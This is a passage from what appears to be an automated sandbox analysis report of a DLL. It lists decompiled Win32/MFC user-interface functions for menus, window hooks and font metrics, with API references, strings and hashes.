							 *(_t358 + 0x74) =  *(_t358 + 0x74) + 1;
							__eflags =  *(_t358 + 0x74) -  *(_t358 + 0x58);
						} while (__eflags < 0);
						goto L27;
					}
					_t369 =  *((intOrPtr*)(_t358 + 0x60)) - _t159;
					if( *((intOrPtr*)(_t358 + 0x60)) == _t159) {
						goto L7;
					}
					_t348 = E10037781(_t267, _t159, _t336, lstrlenA, _t347, _t369,  *((intOrPtr*)(_t358 + 0x70)), _t347,  *((intOrPtr*)(_t358 + 0x78)));
					goto L6;
				}
			}

0x10037781
0x10037781
0x10037785
0x1003778f
0x10037794
0x100377a0
0x100377a5
0x100377ab
0x100377af
0x100377b9
0x100377be
0x100377c4
0x100377ca
0x100377d5
0x100377e5
0x100377ef
0x10037c7d
0x10037c7d
0x10037834
0x1003783a
0x10037844
0x10037853
0x10037853
0x100377f5
0x100377fa
0x00000000
0x10037814
0x10037816
0x1003781d
0x10037856
0x10037859
0x1003785e
0x1003786b
0x10037870
0x1003787d
0x10037885
0x10037889
0x1003788e
0x10037894
0x10037898
0x100378b0
0x100378b6
0x100378ba
0x100378c4
0x100378ce
0x100378e0
0x100378e3
0x100378ee
0x10037900
0x1003790b
0x1003791b
0x10037925
0x1003792d
0x1003792f
0x10037c43
0x10037c46
0x10037c4a
0x10037c52
0x10037c56
0x10037c61
0x10037c69
0x10037c6c
0x10037c74
0x10037c78
0x00000000
0x10037c78
0x10037935
0x10037937
0x00000000
0x00000000
0x10037949
0x1003794b
0x00000000
0x00000000
0x10037954
0x10037954
0x10037959
0x10037960
0x10037963
0x1003796e
0x1003797a
0x1003797c
0x1003797f
0x10037983
0x1003798d
0x10037990
0x100379a1
0x100379a7
0x100379a9
0x00000000
0x00000000
0x100379ab
0x100379ad
0x00000000
0x00000000
0x00000000
0x100379ad
0x100379b1
0x100379b9
0x100379c3
0x100379ce
0x100379d0
0x100379d5
0x100379df
0x100379ea
0x100379ee
0x100379fd
0x10037a09
0x10037a0e
0x10037a10
0x10037a13
0x10037ba3
0x10037baa
0x10037bb7
0x10037bbc
0x10037bcc
0x10037bd1
0x10037bd6
0x10037bd8
0x10037bf5
0x10037bf8
0x10037bfc
0x10037c04
0x10037c08
0x10037c10
0x10037c14
0x10037c1f
0x10037c2a
0x10037c32
0x10037c36
0x10037c3d
0x00000000
0x00000000
0x00000000
0x00000000
0x10037bda
0x10037bda
0x10037be3
0x10037be5
0x10037be7
0x10037bed
0x10037bed
0x10037bf0
0x10037bf1
0x10037bf1
0x00000000
0x00000000
0x00000000
0x00000000
0x10037a19
0x10037a19
0x10037a2b
0x10037a30
0x10037a34
0x10037b70
0x10037b72
0x00000000
0x00000000
0x10037b74
0x10037b7b
0x10037b82
0x10037b8e
0x00000000
0x10037b8e
0x10037a40
0x10037a47
0x10037a57
0x10037a5e
0x10037a63
0x10037a66
0x10037a74
0x10037a74
0x10037a68
0x10037a68
0x10037a6c
0x10037a6c
0x10037a7b
0x10037a8d
0x10037a9d
0x10037ab3
0x10037ace
0x10037adc
0x10037ade
0x10037ae0
0x10037ae2
0x10037ae2
0x10037ae9
0x10037afb
0x10037b0b
0x10037b1f
0x10037b2d
0x10037b2f
0x10037b31
0x10037b33
0x10037b33
0x10037b3a
0x10037b4a
0x10037b4f
0x10037b59
0x10037b5c
0x10037b6a
0x10037b6d
0x00000000
0x10037b94
0x10037b94
0x10037b9a
0x10037b9a
0x00000000
0x10037a19
0x1003781f
0x10037822
0x00000000
0x00000000
0x10037832
0x00000000
0x10037832

APIs

__EH_prolog3.LIBCMT ref: 1003778F
lstrlenA.KERNEL32(ReBarWindow32,00000000,000000F4), ref: 100377B5
GetClassNameA.USER32(?,00000000,00000001), ref: 100377CA

Part of subcall function 1000FED3: _strlen.LIBCMT ref: 1000FEE6

SendMessageA.USER32 ref: 100378CE
SendMessageA.USER32 ref: 100378E3
lstrlenA.KERNEL32(ToolbarWindow32), ref: 100378EA
GetClassNameA.USER32(?,00000000,00000001), ref: 10037900
SendMessageA.USER32 ref: 10037990
IntersectRect.USER32(?,?,?), ref: 100379A1
_memset.LIBCMT ref: 100379B9
CreatePopupMenu.USER32 ref: 100379F3
CopyRect.USER32(?,?), ref: 10037A9D
OffsetRect.USER32 ref: 10037AB3
GetSysColor.USER32 ref: 10037AFD
InsertMenuItemA.USER32 ref: 10037B8E
CopyRect.USER32(?,?), ref: 10037BAA

Part of subcall function 1000CDC3: __EH_prolog3.LIBCMT ref: 1000CDCA
Part of subcall function 1000CDC3: ReleaseDC.USER32(?,00000000), ref: 1000CDE7

Part of subcall function 1000CD56: DeleteDC.GDI32(00000000), ref: 1000CD68

Part of subcall function 1001E680: __EH_prolog3.LIBCMT ref: 1001E687

Strings

ToolbarWindow32, xrefs: 100378E5, 1003791D
P, xrefs: 100378BA
ReBarWindow32, xrefs: 100377AF, 100377B4, 100377E1

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$H_prolog3MessageSend$ClassCopyMenuNamelstrlen$ColorCreateDeleteInsertIntersectItemOffsetPopupRelease_memset_strlen
String ID: P$ReBarWindow32$ToolbarWindow32
API String ID: 891312130-460576549
Opcode ID: a3bd144e737abe0645fe1da6afaf55057a275fc0ba90bc7761989e3142a9a979
Instruction ID: b4c68f327188d744d22f3c9931f261ee9d8a14f523f27da6a36b721c5d26d668
Opcode Fuzzy Hash: a3bd144e737abe0645fe1da6afaf55057a275fc0ba90bc7761989e3142a9a979
Instruction Fuzzy Hash: 3CF18B75900248AFDF16DFA4CC85EEE7BA8FF04341F104119F91AAB2A2DB70EA44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001603B Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1001603B(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E100476B6(0x1008ea86, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(0x1000a083);
				 *(_t116 - 0x120) = _t110;
				_t54 = L10020A61(_t94, 0x100bdc04, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				_t121 = _t120 == 0;
				if(_t120 == 0) {
					_t54 = E1000A069(_t94, _t97, __edi, _t110, _t121);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t55 = E1001E302(_t94, _t106, _t111, __eflags);
					__eflags = _t111;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x100bdecc;
						if( *0x100bdecc == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x100bdba4;
								if( *0x100bdba4 != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x100bdba4; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t116 - 0x14) = _t59;
										if(_t59 != 0) {
											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E10015EF7);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E10049170(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E100124BF(_t94, _t97, _t106, "#32768", __eflags);
								__eflags = _t72;
								 *0x100bdba4 = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E1004BFE6(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E1001E397(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E1001402B(_t111, _t116, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, 0x100149c7);
							__eflags = _t83 - 0x100149c7;
							if(_t83 != 0x100149c7) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E1001D714();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = L1001286D(_t87, "ime");
						__eflags = _t88;
						_pop(_t97);
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E10047739(_t94, _t105, _t110);
				}
			}

0x1001603b
0x1001603b
0x1001603b
0x10016045
0x1001604a
0x1001604d
0x10016050
0x1001605a
0x10016060
0x10016067
0x10016069
0x1001606c
0x10016072
0x10016074
0x10016076
0x10016076
0x1001607f
0x10016094
0x10016096
0x10016099
0x1001609e
0x100160a0
0x100160a4
0x100160aa
0x100160c1
0x100160c1
0x100160c8
0x10016115
0x10016115
0x10016117
0x1001617f
0x10016187
0x100161c3
0x100161cf
0x100161d6
0x10016208
0x1001620b
0x10016211
0x10016213
0x10016216
0x1001621e
0x10016225
0x10016227
0x10016229
0x10016230
0x10016238
0x1001623a
0x1001623d
0x10016240
0x1001624e
0x1001624e
0x1001623d
0x10016229
0x10016254
0x1001625a
0x10016266
0x1001626c
0x10016273
0x10016275
0x1001627a
0x10016280
0x10016280
0x10016280
0x10016280
0x00000000
0x10016284
0x00000000
0x100161d8
0x1001618b
0x10016196
0x100161a1
0x100161a7
0x100161ad
0x100161ae
0x100161b0
0x100161b8
0x100161bb
0x100161c1
0x100161e7
0x100161ed
0x100161ef
0x00000000
0x00000000
0x100161f9
0x100161fd
0x10016202
0x10016206
0x00000000
0x00000000
0x00000000
0x10016206
0x00000000
0x100161c1
0x1001611f
0x10016124
0x1001612b
0x10016134
0x1001614a
0x1001614c
0x10016152
0x10016154
0x10016156
0x10016156
0x1001615e
0x10016162
0x10016166
0x1001616a
0x10016170
0x10016173
0x10016175
0x10016175
0x00000000
0x1001616a
0x100160cd
0x100160d3
0x100160d8
0x00000000
0x00000000
0x100160de
0x100160e1
0x100160e6
0x100160f3
0x100160f7
0x100160fd
0x100160fd
0x10016106
0x1001610b
0x1001610e
0x1001610f
0x00000000
0x00000000
0x00000000
0x1001610f
0x100160ac
0x100160b3
0x00000000
0x00000000
0x100160b9
0x100160bb
0x00000000
0x00000000
0x00000000
0x10016081
0x10016089
0x10016286
0x1001628b
0x1001628b

APIs

__EH_prolog3_GS.LIBCMT ref: 10016045

Part of subcall function 10020A61: __EH_prolog3.LIBCMT ref: 10020A68

CallNextHookEx.USER32 ref: 10016089

Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A

GetClassLongA.USER32(?,000000E6), ref: 100160CD
GlobalGetAtomNameA.KERNEL32 ref: 100160F7
SetWindowLongA.USER32 ref: 1001614C
_memset.LIBCMT ref: 10016196
GetClassLongA.USER32(?,000000E0), ref: 100161C6
GetClassNameA.USER32(?,?,00000100), ref: 100161E7
GetWindowLongA.USER32(?,000000FC), ref: 1001620B
GetPropA.USER32(?,AfxOldWndProc423), ref: 10016225
SetPropA.USER32(?,AfxOldWndProc423,?), ref: 10016230
GetPropA.USER32(?,AfxOldWndProc423), ref: 10016238
GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 10016240
SetWindowLongA.USER32 ref: 1001624E
CallNextHookEx.USER32 ref: 10016266
UnhookWindowsHookEx.USER32 ref: 1001627A

Strings

ime, xrefs: 10016100
AfxOldWndProc423, xrefs: 1001621E, 10016223, 1001622E, 10016236, 1001623F
#32768, xrefs: 100161A8, 100161AD, 100161F7

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423$ime
API String ID: 1191297049-4034971020
Opcode ID: 4e41d8bc3767c021b246338e12286f8aa2d02b8d6f8887c17fdb326e8de98a25
Instruction ID: 4bde84d923aef39c465868793b08f59cf9dd9610db53f90e5a7fdac53ca2e90d
Opcode Fuzzy Hash: 4e41d8bc3767c021b246338e12286f8aa2d02b8d6f8887c17fdb326e8de98a25
Instruction Fuzzy Hash: 1061E035901626ABEB20DB60CD49BDE7BB8EF09365F110194F60AEB191DB34D9C4CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001069 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 221
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E10001069(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t46;
				void* _t133;
				void* _t135;
				void* _t136;
				void* _t140;
				struct HWND__** _t145;
				struct HWND__** _t147;
				void* _t148;
				void* _t151;
				signed int _t152;
				void* _t154;
				char* _t157;

				_t154 = __eflags;
				_t133 = __edx;
				_t103 = __ecx;
				_push(0xffffffff);
				_push(0x1008da6b);
				_push( *[fs:0x0]);
				_t152 = _t151 - 0x14;
				_push(_t135);
				_t46 =  *0x100b9e70; // 0x6fb3f782
				_push(_t46 ^ _t152);
				 *[fs:0x0] = _t152 + 0x28;
				_t140 = __ecx;
				E1001BAAC(__ecx, _t135);
				_push(GetSystemMenu( *(_t140 + 0x20), 0));
				_t136 = E1001E527(0, _t103, _t135, _t140, _t154);
				if(_t136 != 0) {
					L1000140B(_t152 + 0x18, E100184C0());
					 *((intOrPtr*)(_t152 + 0x34)) = 0;
					L10001276(_t152 + 0x18, 0x65);
					if( *((intOrPtr*)( *(_t152 + 0x14) - 0xc)) != 0) {
						AppendMenuA( *(_t136 + 4), 0x800, 0, 0);
						AppendMenuA( *(_t136 + 4), 0, 0x10,  *(_t152 + 0x14));
					}
					 *(_t152 + 0x30) =  *(_t152 + 0x30) | 0xffffffff;
					_t157 =  &(( *(_t152 + 0x14))[0xfffffffffffffff0]);
					L100013E3( &(( *(_t152 + 0x14))[0xfffffffffffffff0]), _t133);
				}
				_t137 = SendMessageA;
				SendMessageA( *(_t140 + 0x20), 0x80, 1,  *(_t140 + 0x358));
				SendMessageA( *(_t140 + 0x20), 0x80, 0,  *(_t140 + 0x358));
				E1000F61B(_t140 + 0x148, 0, 0xff);
				L1000100A(0, _t140 + 0x148, _t133, SendMessageA, 0x80, _t157, 0x80);
				L10001140(0, _t140 + 0x148, _t133, 0x80, E1001768F(_t140, 0x3ed));
				L100011F9(0, _t140 + 0x148, SendMessageA, _t140, _t157);
				SendMessageA( *(_t140 + 0x168), 0x414, 0x10, 0);
				SendMessageA( *(_t140 + 0x168), 0x415, 0, 0x20);
				E1000F61B(_t140 + 0x250, 0, 0xff);
				L1000100A(0, _t140 + 0x250, _t133, SendMessageA, 0x80, _t157, 0x80);
				L10001140(0, _t140 + 0x250, _t133, 0x80, E1001768F(_t140, 0x3ee));
				L100011F9(0, _t140 + 0x250, _t137, _t140, _t157);
				SendMessageA( *(_t140 + 0x270), 0x414, 0x10, 0);
				SendMessageA( *(_t140 + 0x270), 0x415, 0, 0x20);
				E1000F61B(_t140 + 0x2d4, 0, 0xff);
				_t144 = _t140 + 0x2d4;
				L1000100A(0, _t140 + 0x2d4, _t133, _t137, _t140 + 0x2d4, _t157, 0x80);
				L10001140(0, _t144, _t133, _t144, E1001768F(_t140, 0x3ef));
				L100011F9(0, _t144, _t137, _t140, _t157);
				_t145 = _t140 + 0x2f4;
				SendMessageA( *_t145, 0x414, 0x10, 0);
				SendMessageA( *_t145, 0x415, 0, 0x20);
				_t146 = _t140 + 0x1cc;
				E1000F61B(_t140 + 0x1cc, 0, 0xf0);
				L1000100A(0, _t140 + 0x1cc, _t133, _t137, _t146, _t157, 0x78);
				L10001140(0, _t146, _t133, _t146, E1001768F(_t140, 0x3f0));
				L100011F9(0, _t146, _t137, _t140, _t157);
				_t147 = _t140 + 0x1ec;
				SendMessageA( *_t147, 0x414, 0xc, 0);
				SendMessageA( *_t147, 0x415, 0, 0x18);
				_t148 = E1001768F(_t140, 0x3e8);
				GetClientRect( *(_t148 + 0x20), _t152 + 0x18);
				L100014F6(_t148, _t140, _t152 + 0x18);
				 *((intOrPtr*)( *((intOrPtr*)(_t140 + 0x7c)) + 0x54))(0, "Spectrum", 0x50000000, _t152 + 0x24, _t140, 0x1245, 0, 0xc0c0c0, 0, 0xe35b5b, 0, 0x5be35b, 0, 0x5b5be3, 0);
				SendMessageA( *(_t148 + 0x20), 0x10, 0, 0);
				PostMessageA( *(_t140 + 0x20), 0x115, 0,  *(_t140 + 0x168));
				 *[fs:0x0] =  *((intOrPtr*)(_t152 + 0x28));
				return 1;
			}

0x10001069
0x10001069
0x10001069
0x10008510
0x10008512
0x1000851d
0x1000851e
0x10008524
0x10008525
0x1000852c
0x10008531
0x10008537
0x10008539
0x1000854a
0x10008550
0x10008554
0x10008560
0x1000856b
0x1000856f
0x1000857b
0x1000858d
0x10008599
0x10008599
0x1000859f
0x100085a4
0x100085a7
0x100085a7
0x100085b2
0x100085c3
0x100085d0
0x100085df
0x100085eb
0x10008603
0x10008613
0x10008626
0x10008636
0x10008645
0x10008651
0x10008669
0x10008679
0x1000868c
0x1000869c
0x100086ab
0x100086b1
0x100086b9
0x100086cd
0x100086d9
0x100086e6
0x100086ef
0x100086fc
0x10008704
0x1000870d
0x10008716
0x1000872a
0x10008736
0x10008743
0x1000874c
0x10008759
0x10008767
0x10008771
0x1000877f
0x100087a0
0x100087aa
0x100087bb
0x100087c8
0x100087d7

APIs

GetSystemMenu.USER32 ref: 10008544
AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 1000858D
AppendMenuA.USER32(?,00000000,00000010,?), ref: 10008599
SendMessageA.USER32 ref: 100085C3
SendMessageA.USER32 ref: 100085D0
SendMessageA.USER32 ref: 10008626
SendMessageA.USER32 ref: 10008636
SendMessageA.USER32 ref: 1000868C
SendMessageA.USER32 ref: 1000869C
SendMessageA.USER32 ref: 100086EF
SendMessageA.USER32 ref: 100086FC
SendMessageA.USER32 ref: 1000874C
SendMessageA.USER32 ref: 10008759
GetClientRect.USER32 ref: 10008771
SendMessageA.USER32 ref: 100087AA
PostMessageA.USER32(?,00000115,00000000,?), ref: 100087BB

Strings

Spectrum, xrefs: 1000879A

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$Send$Menu$Append$ClientPostRectSystem
String ID: Spectrum
API String ID: 2066304807-103510960
Opcode ID: b5cc9c2296e574058509840be55fbeef93d50fa0541e700fa9086c0337b757a2
Instruction ID: e2de74c3c2d5a4a58301f47727eb28d82eb25700d7cd5afd40f373a8dffbfa27
Opcode Fuzzy Hash: b5cc9c2296e574058509840be55fbeef93d50fa0541e700fa9086c0337b757a2
Instruction Fuzzy Hash: 44718F75240B48BFE625EB20CC86FEF77ADFF84784F000928B25A561E2DA71BD448B14

Uniqueness

Uniqueness Score: -1.00%

Function 1002A272 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E1002A272(void* __ecx, void* __eflags, intOrPtr _a4, signed short _a8, int _a12, int _a16, intOrPtr* _a20) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				struct HDC__* _v72;
				int _v76;
				void* _v80;
				void* _v84;
				intOrPtr* _v88;
				struct tagSIZE _v96;
				struct tagTEXTMETRICA _v152;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t41;
				int _t46;
				void* _t54;
				signed int _t69;
				int _t76;
				void* _t77;
				signed int _t81;
				signed int _t82;
				void* _t83;
				intOrPtr* _t85;
				signed int _t87;

				_t77 = __ecx;
				_t41 =  *0x100b9e70; // 0x6fb3f782
				_v8 = _t41 ^ _t87;
				_t85 = _a20;
				_v88 = _t85;
				_v72 = GetDC(0);
				E10049170(_t83,  &_v68, 0, 0x3c);
				_t46 = GetDeviceCaps(_v72, 0x5a);
				_t84 = MulDiv;
				_v68.lfHeight =  ~(MulDiv(_a8 & 0x0000ffff, _t46, 0x48));
				_v68.lfWeight = 0x190;
				_v68.lfCharSet = 1;
				_push(L10048E92( &(_v68.lfFaceName), 0x20, _a4, 0xffffffff));
				L1000135C(_a4, _t77, MulDiv, _t85);
				_t54 = CreateFontIndirectA( &_v68);
				_v80 = _t54;
				if(_t54 == 0) {
					_v76 = GetDialogBaseUnits() & 0x0000ffff;
					_t76 = GetDialogBaseUnits() >> 0x10;
				} else {
					_v84 = SelectObject(_v72, _t54);
					GetTextMetricsA(_v72,  &_v152);
					_t76 = _v152.tmExternalLeading + _v152.tmHeight;
					GetTextExtentPoint32A(_v72, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", 0x34,  &_v96);
					_t69 = _v96.cx + 0x1a;
					_t81 = 0x34;
					asm("cdq");
					_t82 = _t69 % _t81;
					_v76 = _t69 / _t81;
					SelectObject(_v72, _v84);
					DeleteObject(_v80);
					_t85 = _v88;
				}
				ReleaseDC(0, _v72);
				 *_t85 = MulDiv(_a12, _v76, 4);
				 *((intOrPtr*)(_t85 + 4)) = MulDiv(_a16, _t76, 8);
				return E1004763E(_t60, _t76, _v8 ^ _t87, _t82, _t84, _t85);
			}

0x1002a272
0x1002a27b
0x1002a282
0x1002a28a
0x1002a290
0x1002a29b
0x1002a2a4
0x1002a2b3
0x1002a2b9
0x1002a2cc
0x1002a2d5
0x1002a2dc
0x1002a2e5
0x1002a2e6
0x1002a2f2
0x1002a2fa
0x1002a2fd
0x1002a371
0x1002a378
0x1002a2ff
0x1002a30b
0x1002a318
0x1002a32a
0x1002a33b
0x1002a344
0x1002a349
0x1002a34a
0x1002a34b
0x1002a353
0x1002a356
0x1002a35b
0x1002a361
0x1002a361
0x1002a380
0x1002a396
0x1002a39e
0x1002a3ab

APIs

GetDC.USER32(00000000), ref: 1002A293
_memset.LIBCMT ref: 1002A2A4
GetDeviceCaps.GDI32(?,0000005A), ref: 1002A2B3
MulDiv.KERNEL32 ref: 1002A2C5
_wctomb_s.LIBCMT ref: 1002A2E0

Part of subcall function 10048E92: __mbsnbcpy_s_l.LIBCMT ref: 10048EA4

CreateFontIndirectA.GDI32(?), ref: 1002A2F2
SelectObject.GDI32(?,00000000), ref: 1002A309
GetTextMetricsA.GDI32(?,?), ref: 1002A318
GetTextExtentPoint32A.GDI32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 1002A33B
SelectObject.GDI32(?,?), ref: 1002A356
DeleteObject.GDI32(?), ref: 1002A35B
GetDialogBaseUnits.USER32 ref: 1002A36C
GetDialogBaseUnits.USER32 ref: 1002A374
ReleaseDC.USER32(00000000,?), ref: 1002A380
MulDiv.KERNEL32 ref: 1002A38E
MulDiv.KERNEL32 ref: 1002A398

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 1002A333

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
